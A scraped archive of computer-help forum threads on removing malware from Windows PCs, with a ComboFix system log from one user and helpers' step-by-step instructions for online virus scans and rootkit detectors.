+ 2011-06-28 18:21 . 2011-05-24 10:37252928 c:\windows\SysWOW64\drvinst.exe
- 2009-07-13 23:16 . 2009-07-14 01:14252928 c:\windows\SysWOW64\drvinst.exe
+ 2011-06-28 18:21 . 2011-05-24 10:39145920 c:\windows\SysWOW64\cfgmgr32.dll
- 2011-02-23 19:18 . 2010-11-20 12:18145920 c:\windows\SysWOW64\cfgmgr32.dll
+ 2010-06-26 23:39 . 2011-06-29 13:12362562 c:\windows\system32\wdi\SuspendPerformanceDiagnostics_SystemData_S4.bin
+ 2010-06-17 04:47 . 2011-06-29 02:41377912 c:\windows\system32\wdi\SuspendPerformanceDiagnostics_SystemData_FastS4.bin
+ 2011-06-28 18:21 . 2011-05-24 11:42404480 c:\windows\system32\umpnpmgr.dll
- 2011-02-23 19:19 . 2010-11-20 13:27404480 c:\windows\system32\umpnpmgr.dll
- 2009-07-14 00:30 . 2009-07-14 01:39249856 c:\windows\system32\SearchProtocolHost.exe
+ 2011-06-28 18:21 . 2011-05-04 05:19249856 c:\windows\system32\SearchProtocolHost.exe
+ 2011-06-28 18:21 . 2011-05-04 05:19591872 c:\windows\system32\SearchIndexer.exe
- 2009-07-14 00:29 . 2009-07-14 01:39113664 c:\windows\system32\SearchFilterHost.exe
+ 2011-06-28 18:21 . 2011-05-04 05:19113664 c:\windows\system32\SearchFilterHost.exe
+ 2009-07-14 02:36 . 2011-06-28 17:52676016 c:\windows\system32\perfh009.dat
+ 2009-07-14 02:36 . 2011-06-28 17:52126136 c:\windows\system32\perfc009.dat
- 2011-02-23 19:19 . 2010-11-20 13:27778752 c:\windows\system32\mssvp.dll
+ 2011-06-28 18:21 . 2011-05-04 05:22778752 c:\windows\system32\mssvp.dll
- 2011-02-23 19:18 . 2010-11-20 13:27288256 c:\windows\system32\mssphtb.dll
+ 2011-06-28 18:21 . 2011-05-04 05:22288256 c:\windows\system32\mssphtb.dll
- 2009-07-14 00:30 . 2009-07-14 01:41491520 c:\windows\system32\mssph.dll
+ 2011-06-28 18:21 . 2011-05-04 05:22491520 c:\windows\system32\mssph.dll
- 2009-07-14 04:45 . 2011-06-28 15:09444696 c:\windows\system32\FNTCACHE.DAT
+ 2009-07-14 04:45 . 2011-06-28 18:24444696 c:\windows\system32\FNTCACHE.DAT
+ 2009-07-14 05:30 . 2011-06-28 18:15143360 c:\windows\system32\DriverStore\infstrng.dat
- 2009-07-14 05:30 . 2011-06-20 22:42143360 c:\windows\system32\DriverStore\infstrng.dat
- 2009-07-14 05:30 . 2011-06-20 22:42143360 c:\windows\system32\DriverStore\infstor.dat
+ 2009-07-14 05:30 . 2011-06-28 18:15143360 c:\windows\system32\DriverStore\infstor.dat
+ 2011-04-20 06:02 . 2011-04-20 06:02278528 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\Oemdspif.dll
+ 2011-04-20 06:03 . 2011-04-20 06:03120320 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atitmm64.dll
+ 2011-04-20 06:02 . 2011-04-20 06:02356352 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atipdlxx.dll
+ 2011-04-20 06:02 . 2011-04-20 06:02423424 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atipdl64.dll
+ 2010-08-27 22:33 . 2010-08-27 22:33332800 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\ATIODE.exe
+ 2011-04-20 05:22 . 2011-04-20 05:22306176 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atikmpag.sys
+ 2011-03-01 01:30 . 2011-03-01 01:30233012 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiicdxx.dat
+ 2011-04-20 06:04 . 2011-04-20 06:04203776 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiesrxx.exe
+ 2011-04-20 06:04 . 2011-04-20 06:04480256 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atieclxx.exe
+ 2011-04-20 06:05 . 2011-04-20 06:05462848 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\ATIDEMGX.dll
+ 2011-04-20 06:07 . 2011-04-20 06:07795648 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\aticfx64.dll
+ 2011-04-20 06:09 . 2011-04-20 06:09676864 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\aticfx32.dll
+ 2009-05-12 01:35 . 2009-05-12 01:35118784 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atibtmon.exe
+ 2011-04-20 06:09 . 2011-04-20 06:09151552 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiapfxx.exe
+ 2011-04-20 05:23 . 2011-04-20 05:23262144 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiadlxy.dll
+ 2011-04-20 05:23 . 2011-04-20 05:23366080 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiadlxx.dll
+ 2010-08-27 22:33 . 2010-08-27 22:33332800 c:\windows\system32\ATIODE.exe
+ 2011-03-01 01:30 . 2011-03-01 01:30233012 c:\windows\system32\atiicdxx.dat
- 2009-07-14 04:46 . 2011-06-28 16:56104728 c:\windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareProtectionPlatform\Cache\cache.dat
+ 2009-07-14 04:46 . 2011-06-28 19:23104728 c:\windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareProtectionPlatform\Cache\cache.dat
+ 2009-07-14 05:01 . 2011-07-01 01:42439272 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-System.dat
+ 2011-06-28 18:21 . 2011-05-04 04:341549312 c:\windows\SysWOW64\tquery.dll
+ 2011-06-28 18:21 . 2011-05-04 04:321401344 c:\windows\SysWOW64\mssrch.dll
- 2011-02-23 19:19 . 2010-11-20 12:191401344 c:\windows\SysWOW64\mssrch.dll
+ 2011-06-28 18:21 . 2011-05-04 05:252315776 c:\windows\system32\tquery.dll
+ 2011-06-28 18:21 . 2011-05-04 05:222223616 c:\windows\system32\mssrch.dll
- 2011-02-23 19:19 . 2010-11-20 13:272223616 c:\windows\system32\mssrch.dll
+ 2011-04-20 05:30 . 2011-04-20 05:304056576 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiumdva.dll
+ 2011-04-20 05:40 . 2011-04-20 05:401923584 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiumdmv.dll
+ 2011-04-20 05:38 . 2011-04-20 05:384286464 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiumdag.dll
+ 2011-04-20 05:40 . 2011-04-20 05:401222656 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiumd6v.dll
+ 2011-04-20 05:40 . 2011-04-20 05:403868672 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiumd6a.dll
+ 2011-04-20 05:31 . 2011-04-20 05:315440000 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atiumd64.dll
+ 2011-04-20 06:44 . 2011-04-20 06:449319936 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atikmdag.sys
+ 2011-04-20 05:49 . 2011-04-20 05:494951552 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atidxx64.dll
+ 2011-04-20 05:59 . 2011-04-20 05:594161536 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atidxx32.dll
+ 2011-04-20 05:45 . 2011-04-20 05:457768064 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\aticaldd64.dll
+ 2011-04-20 05:42 . 2011-04-20 05:426389760 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\aticaldd.dll
- 2009-07-14 04:45 . 2011-06-28 16:237383570 c:\windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareProtectionPlatform\tokens.dat
+ 2009-07-14 04:45 . 2011-06-28 18:267383570 c:\windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareProtectionPlatform\tokens.dat
+ 2011-05-05 09:10 . 2011-06-28 17:561693384 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-3224318273-3311775750-3685103505-1006-8192.dat
+ 2010-06-17 07:14 . 2011-07-01 01:422765752 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-3224318273-3311775750-3685103505-1000-8192.dat
+ 2010-06-15 09:13 . 2011-06-29 13:371820484 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-3224318273-3311775750-3685103505-1000-12288.dat
+ 2011-01-15 13:46 . 2011-01-15 13:462049536 c:\windows\Installer\49cfd.msi
- 2009-07-14 02:34 . 2011-06-15 07:5410485760 c:\windows\system32\SMI\Store\Machine\schema.dat
+ 2009-07-14 02:34 . 2011-06-28 18:2210485760 c:\windows\system32\SMI\Store\Machine\schema.dat
+ 2011-04-20 06:07 . 2011-04-20 06:0717693184 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atioglxx.dll
+ 2011-04-20 06:30 . 2011-04-20 06:3022900736 c:\windows\system32\DriverStore\FileRepository\c7118908.inf_amd64_neutral_8dc4ff304e4afff6\B117547\atio6axx.dll
+ 2011-04-06 19:08 . 2011-07-01 01:4238610644 c:\windows\ServiceProfiles\LocalService\AppData\Local\FontCache-S-1-5-21-3224318273-3311775750-3685103505-1000-4096.dat
+ 2009-07-14 05:30 . 2011-06-28 18:151036795904 c:\windows\system32\DriverStore\infpub.dat
- 2009-07-14 05:30 . 2011-06-20 22:421036795904 c:\windows\system32\DriverStore\infpub.dat
.
-- Snapshot reset to current date --
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files (x86)\Windows Sidebar\sidebar.exe" [2010-11-20 1174016]
"HydraVisionDesktopManager"="c:\program files (x86)\ATI Technologies\HydraVision\HydraDM.exe" [2009-11-04 380928]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"NUSB3MON"="c:\program files (x86)\NEC Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe" [2009-10-21 106496]
"ATICustomerCare"="c:\program files (x86)\ATI\ATICustomerCare\ATICustomerCare.exe" [2010-03-04 311296]
"Adobe Reader Speed Launcher"="c:\program files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2011-06-08 37296]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2011-03-30 937920]
"SunJavaUpdateSched"="c:\program files (x86)\Common Files\Java\Java Update\jusched.exe" [2011-04-08 254696]
"KTbWorks"="c:\program files (x86)\Kensington TrackballWorks\KTbWorksL.exe" [2010-07-01 426064]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce]
"GBTUpd"="c:\program files (x86)\GIGABYTE\GBTUpd\PreRun.exe" [2008-04-03 297480]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Device Detector 3.lnk - c:\program files (x86)\Olympus\DeviceDetector\DevDtct2.exe [2010-6-20 118784]
Qshelf.lnk - c:\program files\Microsoft Reference\Bookshelf 98\qshelf98.exe [2010-6-27 123904]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoThumbnailCache"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\drivers32]
"aux1"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Security PackagesREG_MULTI_SZ kerberos msv1_0 schannel wdigest tspkg pku2u livessp
.
R2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-03-18 130384]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-03-18 138576]
R3 AODDriver;AODDriver;c:\program files (x86)\GIGABYTE\ET6\amd64\AODDriver.sys [2010-07-29 52280]
R3 esihdrv;esihdrv;

R3 etdrv;etdrv;c:\windows\etdrv.sys [2010-07-03 25640]
R3 GVTDrv64;GVTDrv64;c:\windows\GVTDrv64.sys [2010-08-11 30528]
R3 nusb3hub;NEC Electronics USB 3.0 Hub Driver;c:\windows\system32\DRIVERS\nusb3hub.sys

R3 nusb3xhc;NEC Electronics USB 3.0 Host Controller Driver;c:\windows\system32\DRIVERS\nusb3xhc.sys

R3 rtkio;rtkio;c:\program files (x86)\Realtek\Smart Dual Lan\rtkio.sys [2009-07-15 17392]
R3 SWDUMon;SWDUMon;c:\windows\system32\DRIVERS\SWDUMon.sys

R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys

R3 vpcuxd;USB Virtualization Stub Service;c:\windows\system32\drivers\vpcuxd.sys

R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe

R4 JMB36X;JMB36X;c:\windows\SysWOW64\XSrvSetup.exe [2009-08-06 65536]
R4 SDLService;SDLService;c:\program files (x86)\Realtek\Smart Dual Lan\SDLService.exe [2009-10-23 88064]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe [2010-09-22 57184]
R4 WTService;WTService;c:\windows\System32\atwtusb.exe

S0 PxHlpa64;PxHlpa64;c:\windows\System32\Drivers\PxHlpa64.sys

S1 AppleCharger;AppleCharger;c:\windows\system32\DRIVERS\AppleCharger.sys

S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe

S2 KTbWorksService;Kensington TrackballWorks Service;c:\program files (x86)\Kensington TrackballWorks\KTbWorksS.exe [2010-07-01 50256]
S2 OS Selector;Acronis OS Selector activator;c:\program files (x86)\Acronis\DiskDirector\OSS\reinstall_svc.exe [2010-09-29 2139400]
S2 Smart TimeLock;Smart TimeLock Service;c:\program files (x86)\GIGABYTE\Smart6\Timelock\TimeMgmtDaemon.exe [2009-10-13 114688]
S3 amdkmdag;amdkmdag;c:\windows\system32\DRIVERS\atikmdag.sys

S3 amdkmdap;amdkmdap;c:\windows\system32\DRIVERS\atikmpag.sys

S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys

.
.
Contents of the 'Scheduled Tasks' folder
.
2011-07-01 c:\windows\Tasks\FixCleaner Startup.job
- c:\program files (x86)\FixCleaner\FixCleaner.exe [2011-06-01 18:33]
.
2011-06-28 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3224318273-3311775750-3685103505-1000Core.job
- c:\users\Frank C\AppData\Local\Google\Update\GoogleUpdate.exe [2010-07-07 02:58]
.
2011-07-01 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3224318273-3311775750-3685103505-1000UA.job
- c:\users\Frank C\AppData\Local\Google\Update\GoogleUpdate.exe [2010-07-07 02:58]
.
.
--------- x86-64 -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"combofix"="c:\combofix\CF840.cfxxe" [X]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2010-01-19 9996320]
"MacroKeyManager"="WTMKM.exe" [2009-05-21 5594272]
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.excite.com/
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride =
TCP: DhcpNameServer = 192.168.2.1 192.168.2.1
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil10s_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil10s_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash10s.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash10s.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash10s.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash10s.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}]
@Denied: (A 2) (Everyone)
@="IFlashBroker4"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
------------------------ Other Running Processes ------------------------
.
c:\program files (x86)\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
c:\program files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
c:\program files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
c:\program files (x86)\Common Files\Microsoft Shared\Ink\TabTip32.exe
.
**************************************************************************
.
Completion time: 2011-06-30 21:49:33 - machine was rebooted
ComboFix-quarantined-files.txt 2011-07-01 01:49
ComboFix2.txt 2011-06-28 17:49
ComboFix3.txt 2011-06-16 14:12
.
Pre-Run: 441,730,760,704 bytes free
Post-Run: 441,197,662,208 bytes free
.
- - End Of File - - 1FC31389D708BFFA6EAC8EA99E20EC6A

I'll not try ESET in another post.
Frank C.

I tried ESET. To get some type of response I had to right click the Download button and select Copy Shortcut and Paste it into the address bar. But that did not work. I was just taken back to the same page. So I was not able to download ESET.
Frank C.
Ok. Let's try this one.

Run the BitDefender Online scanner

Agree to the license and then select Scan. DO NOT CHANGE THE OPTIONS TO SHOW ALL FILES SCANNED. That will make your logs huge and we don't need to see clean files.

Once Bitdefender completes the scan:
Click-on the Detected Problems tab.
Then select Click here to export the scan report.

When the window COMES up to save the report, change the Save as type: box to:
Text (Tab Delimited) (*.txt) and then in the File name box enter change to bdscan then click Save.

This will save a file named bdscan.txt. I would suggest saving it to the Desktop so you can easily find it. (take notice of where you save it so you can find it later).
This bdcan.txt file will actually contain HTML code that we can easily view later while reviewing your log. All we have to do is rename the file to bdscan.html.

If you do not follow these step, you will have an incorrect log or worse a log summary which is useless to us.

Post the bdscan.txt file as an Attachment.
Won't run. A big black top margin box appears with a big green arrow pointing to the Home icon and the Panning Hand icon but there is no browser confirmation message the green arrow is supposed to be pointing towards. There is a notice that the BitDefender Quick Scan is running but I let it run for over an hour and nothing is happening. I would guess its waiting for me to click on the browser confirmation message. Frank C. Let's try this one.

Please go to Kaspersky website and perform an online antivirus scan.

1. Read through the requirements and privacy statement and click on Accept button.
2. It will start downloading and installing the scanner and virus DEFINITIONS. You will be prompted to install an application from Kaspersky. Click Run.
3. When the downloads have finished, click on Settings.
4. Make sure these boxes are checked (ticked). If they are not, please tick them and click on the Save button:
Spyware, Adware, Dialers, and other potentially dangerous programs
Archives

5. Click on My Computer under Scan.
6. Once the scan is complete, it will display the results. Click on View Scan Report.
7. You will see a list of infected items there. Click on Save Report As....
8. Save this report to a convenient place. Change the Files of type to Text file (.txt) before clicking on the Save button.
9. Please post this log in your next reply along with a fresh HijackThis log.
Discussion
3256.

Solve : yofee.9966.org?

Answer»

Hello CH Experts,

This is from my work (but out-of-scope from my job responsibility) and NEED to consult you something. Please see attached screen-shot. According to my client, when they restart their DATABASE server (Windows 2003 Server), a command prompt opens automatically. This is very strange and just happened today. And I found out also that they don't have any anti-virus installed.

I advised them to consult their local IT about it and INSTALL anti-virus program, so from there, they may have an idea what it caused.

But out of curiosity, what the h3ll is this yofee.9966.org?

[recovering disk space - OLD attachment deleted by admin]A quick search on google hong kong version turns up that it is a Chinese virus, a trojan horse that relies on FTP connections to download malware.

Translated to ENGLISH
Discussion
3257.

Solve : trojan program evads norton?

Answer»

I keep getting a trojan program that Norton only seems to stop about 50% of the time. It asks you if you want to have your PC checked for viruses.
IF you click on X , it continues and SHOWS you it is checking all your files. IF accept it it will take over your pc and shows you how to BUY an antivirus program.

I had to reload my SYSTEM to get rid of it.

IF you keep checking X sometimes you can stop it.
thanks for the helpHow did you "reload your system"?
Discussion
3258.

Solve : worms in my computer?

Answer»

Re-running ComboFix to remove infections:

  • Close any open browsers.
  • Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.
  • Open notepad and copy/paste the text in the quotebox below into it:
    Quote
    KillAll::

    File::

    c:\windows\DUMP78e9.tmp
    c:\windows\DUMP74e1.tmp

    DDS::
    Trusted Zone: bcnonline.com\www

  • Save this as CFScript.txt, in the same location as ComboFix.exe



  • Referring to the picture above, drag CFScript into ComboFix.exe
  • When finished, it shall produce a log for you at C:\ComboFix.txt
  • I don't need to see the log from this action.
*************************************************
SysProt Antirootkit

Download
SysProt Antirootkit from the link below (you will find it at the bottom
of the page under attachments, or you can get it from one of the
mirrors).

http://sites.google.com/site/sysprotantirootkit/

Unzip it into a folder on your DESKTOP.
  • Double click Sysprot.exe to start the program.
  • Click on the Log tab.
  • In the Write to log box select the following items.
    • Process << Selected
    • Kernel Modules << Selected
    • SSDT << Selected
    • Kernel Hooks << Selected
    • IRP Hooks << NOT Selected
    • Ports << NOT Selected
    • Hidden Files << Selected
  • At the bottom of the page
    • Hidden Objects Only << Selected
  • Click on the Create Log button on the bottom right.
  • After a few seconds a new window should appear.
  • Select Scan Root Drive. Click on the Start button.
  • When it is complete a new window will appear to indicate that the scan is finished.
  • The log will be saved automatically in the same folder Sysprot.exe was extracted to. Open the text file and copy/paste the log here.
After doing the CFScript and the SysProt, and after the smoke cleared, I am looking for the text file. At first it seemed to tell me there was nothing found....poking around I found this.
MZ? ÿÿ ? @ P º ?Í!?LÍ!This program cannot be run in DOS mode.
The main body of this log was deleted by myself, Dave.
It´s all Greek to me........ the SysProt ran fine ( I think) did I miss something?
Quote
MZ? ÿÿ ? @ P º ? Í!?LÍ!This program cannot be run in DOS mode. $

Did you follow the instructions? It states that you cannot run this in DOS mode. I did not run it in DOS, I am not nearly that smart, I ran it like I was instructed. Here is something I found on the desktop at the end of the day.
# Archive C:\Documents and Settings\gne\Escritorio\SysProt.zip
2009-03-15 23:11 Folder Folder SysProt
2009-03-15 20:18 145408 139772 SysProt\SysProt.exe
2009-03-15 23:10 268146 214248 SysProt\SysProt_AntiRootkit_Help.pdf
#
# TOTAL Size Packed Files
# 413554 354020 3

Ok. Let's just forget about this scanner and we'll TRY another.

* Download the following TOOL: RootRepeal - Rootkit Detector
* Direct download link is here: RootRepeal.zip

* Close all programs and temporarily disable your anti-virus, Firewall and any anti-malware real-time protection before performing a scan.
* Click this link to see a list of such programs and how to disable them.

* Extract the program file to a new folder such as C:\RootRepeal
* Run the program RootRepeal.exe and go to the REPORT tab and click on the Scan button.
* Select ALL of the checkboxes and then click OK and it will start scanning your system.
* If you have multiple drives you only need to check the C: drive or the one Windows is installed on.
* When done, click on Save Report
* Save it to the same location where you ran it from, such as C:RootRepeal
* Save it as rootrepeal.txt
* Then open that log and select all and copy/paste it BACK on your next reply please.
* Close RootRepeal.
Discussion
3259.

Solve : Need help removing virus/malware/spyware...?

Answer»

Dave,

I completed the steps you instructed ComboFix did run, where do I go to OBTAIN the scan report? Do I need to or was this the last step?Quote

I completed the steps you instructed ComboFix did run, where do I go to obtain the scan report? Do I need to or was this the last step?
You can go to your C drive and look in the Combo-Fix folder and look for the combo-fix.txt file. Or, you can just do a search for combo-fix.txt. I need to this LOG.
Discussion
3260.

Solve : No virus but Combo log attached just in case?

Answer»

No panic.
MBAM has recently been ballooning various messages saying it is blocking incoming ip sites from access, so it is doing its job!
To be on the safe side l've just run Avast AV, HJTHIS, SAS, and MBAM scans and all run clean, with no errors showing.
Can't remember where, but l read that running Combofix ALSO solves some problems. Googled it and it seems a powerful program but l couldn't see why l shouldn't run it, as long as l didn't attempt to correct anything myself, without help from yourselves.
